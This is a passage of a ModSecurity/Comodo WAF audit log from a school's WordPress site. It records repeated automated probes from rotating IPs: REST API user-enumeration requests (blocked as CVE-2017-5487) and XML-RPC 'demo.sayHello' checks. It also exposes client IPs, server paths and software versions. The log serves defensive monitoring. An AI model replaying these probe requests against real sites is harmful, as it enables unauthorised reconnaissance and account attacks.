userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460333193076 6180 (- - -) Stopwatch2: 1746460333193076 6180; combined=4509, p1=552, p2=3727, p3=32, p4=33, p5=96, sr=74, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fb82e35b-Z-- --4613561c-A-- [05/May/2025:22:53:52 +0700] aBjfEPZJDMuQndL03JNa0QAAAFI 103.236.140.4 39662 103.236.140.4 8181 --4613561c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.255 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.255 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4613561c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4613561c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460432011247 3350 (- - -) Stopwatch2: 1746460432011247 3350; combined=1433, p1=486, p2=914, p3=0, p4=0, p5=33, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4613561c-Z-- --b55ef345-A-- [05/May/2025:22:53:54 +0700] aBjfEoZWvR7-42f6JrALlwAAANM 103.236.140.4 39684 103.236.140.4 8181 --b55ef345-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.255 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.255 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b55ef345-C-- demo.sayHello --b55ef345-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b55ef345-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460434869500 5611 (- - -) Stopwatch2: 1746460434869500 5611; combined=4178, p1=521, p2=3434, p3=31, p4=36, p5=92, sr=74, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b55ef345-Z-- --6bf7f213-A-- [05/May/2025:22:54:18 +0700] aBjfKgRwKNFSM6B7_Lae_wAAAIU 103.236.140.4 39888 103.236.140.4 8181 --6bf7f213-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.243 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.243 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6bf7f213-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6bf7f213-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460458736253 2817 (- - -) Stopwatch2: 1746460458736253 2817; combined=1417, p1=453, p2=933, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6bf7f213-Z-- --f8a9102c-A-- [05/May/2025:22:54:21 +0700] aBjfLfZJDMuQndL03JNa7wAAAEg 103.236.140.4 39908 103.236.140.4 8181 --f8a9102c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.243 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.243 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f8a9102c-C-- demo.sayHello --f8a9102c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f8a9102c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460461529804 5680 (- - -) Stopwatch2: 1746460461529804 5680; combined=4142, p1=527, p2=3391, p3=33, p4=35, p5=92, sr=73, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f8a9102c-Z-- --002c9d37-A-- [05/May/2025:22:54:40 +0700] aBjfQE2V_h1VFAgsfgZ7KgAAAAI 103.236.140.4 40090 103.236.140.4 8181 --002c9d37-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.173.228 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.173.228 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --002c9d37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --002c9d37-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460480260221 2211 (- - -) Stopwatch2: 1746460480260221 2211; combined=1187, p1=384, p2=772, p3=0, p4=0, p5=31, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --002c9d37-Z-- --bbf92c58-A-- [05/May/2025:22:54:43 +0700] aBjfQ02V_h1VFAgsfgZ7MgAAAAA 103.236.140.4 40118 103.236.140.4 8181 --bbf92c58-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.173.228 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.173.228 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bbf92c58-C-- demo.sayHello --bbf92c58-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bbf92c58-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460483440926 6857 (- - -) Stopwatch2: 1746460483440926 6857; combined=5135, p1=649, p2=4210, p3=74, p4=42, p5=96, sr=80, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bbf92c58-Z-- --1c032129-A-- [05/May/2025:22:55:24 +0700] aBjfbE2V_h1VFAgsfgZ7WQAAAA4 103.236.140.4 40448 103.236.140.4 8181 --1c032129-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.101 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1c032129-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c032129-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460524819655 2545 (- - -) Stopwatch2: 1746460524819655 2545; combined=1291, p1=395, p2=868, p3=0, p4=0, p5=28, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c032129-Z-- --57f6a270-A-- [05/May/2025:22:55:27 +0700] aBjfb02V_h1VFAgsfgZ7YwAAABg 103.236.140.4 40484 103.236.140.4 8181 --57f6a270-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.101 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --57f6a270-C-- demo.sayHello --57f6a270-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --57f6a270-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460527850622 5346 (- - -) Stopwatch2: 1746460527850622 5346; combined=4323, p1=491, p2=3601, p3=32, p4=36, p5=96, sr=72, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --57f6a270-Z-- --3b28246a-A-- [05/May/2025:22:55:30 +0700] aBjfcvZJDMuQndL03JNa_gAAAE0 103.236.140.4 40520 103.236.140.4 8181 --3b28246a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.32.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.32.75 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3b28246a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b28246a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460530108776 2565 (- - -) Stopwatch2: 1746460530108776 2565; combined=1274, p1=424, p2=821, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b28246a-Z-- --68739876-A-- [05/May/2025:22:55:32 +0700] aBjfdE2V_h1VFAgsfgZ7awAAAAc 103.236.140.4 40556 103.236.140.4 8181 --68739876-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.32.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.32.75 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --68739876-C-- demo.sayHello --68739876-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --68739876-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460532827794 4906 (- - -) Stopwatch2: 1746460532827794 4906; combined=3913, p1=491, p2=3194, p3=26, p4=39, p5=95, sr=69, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68739876-Z-- --002dde00-A-- [05/May/2025:22:55:35 +0700] aBjfd_ZJDMuQndL03JNbAQAAAEM 103.236.140.4 40584 103.236.140.4 8181 --002dde00-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.26 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --002dde00-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --002dde00-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460535892392 2264 (- - -) Stopwatch2: 1746460535892392 2264; combined=1179, p1=389, p2=760, p3=0, p4=0, p5=29, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --002dde00-Z-- --dbd2946f-A-- [05/May/2025:22:55:38 +0700] aBjfeoZWvR7-42f6JrALxgAAAMs 103.236.140.4 40610 103.236.140.4 8181 --dbd2946f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.26 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dbd2946f-C-- demo.sayHello --dbd2946f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dbd2946f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460538667250 5671 (- - -) Stopwatch2: 1746460538667250 5671; combined=3851, p1=561, p2=3055, p3=37, p4=36, p5=95, sr=74, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dbd2946f-Z-- --a19c8569-A-- [05/May/2025:22:55:54 +0700] aBjfioZWvR7-42f6JrALygAAANQ 103.236.140.4 40734 103.236.140.4 8181 --a19c8569-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.110 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a19c8569-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a19c8569-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460554343358 2764 (- - -) Stopwatch2: 1746460554343358 2764; combined=1208, p1=406, p2=773, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a19c8569-Z-- --8ac2923f-A-- [05/May/2025:22:55:57 +0700] aBjfjYZWvR7-42f6JrALywAAAMA 103.236.140.4 40766 103.236.140.4 8181 --8ac2923f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.110 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8ac2923f-C-- demo.sayHello --8ac2923f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ac2923f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460557932886 5923 (- - -) Stopwatch2: 1746460557932886 5923; combined=4410, p1=551, p2=3625, p3=33, p4=34, p5=98, sr=73, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ac2923f-Z-- --70b1b510-A-- [05/May/2025:22:56:07 +0700] aBjflwRwKNFSM6B7_LafLwAAAIM 103.236.140.4 40856 103.236.140.4 8181 --70b1b510-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.138.157 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.138.157 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --70b1b510-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --70b1b510-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460567841912 2486 (- - -) Stopwatch2: 1746460567841912 2486; combined=1209, p1=410, p2=769, p3=0, p4=0, p5=29, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70b1b510-Z-- --b501f155-A-- [05/May/2025:22:56:11 +0700] aBjfmwRwKNFSM6B7_LafNAAAAIg 103.236.140.4 40892 103.236.140.4 8181 --b501f155-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.138.157 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.138.157 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b501f155-C-- demo.sayHello --b501f155-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b501f155-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460571490070 5886 (- - -) Stopwatch2: 1746460571490070 5886; combined=4263, p1=536, p2=3472, p3=32, p4=35, p5=108, sr=73, sw=80, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b501f155-Z-- --3365db68-A-- [05/May/2025:22:56:27 +0700] aBjfq02V_h1VFAgsfgZ7mQAAAAw 103.236.140.4 41040 103.236.140.4 8181 --3365db68-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.97.213 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.97.213 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 